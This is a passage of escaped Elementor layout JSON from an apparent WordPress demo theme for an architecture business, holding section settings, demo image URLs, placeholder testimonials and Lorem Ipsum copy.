litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\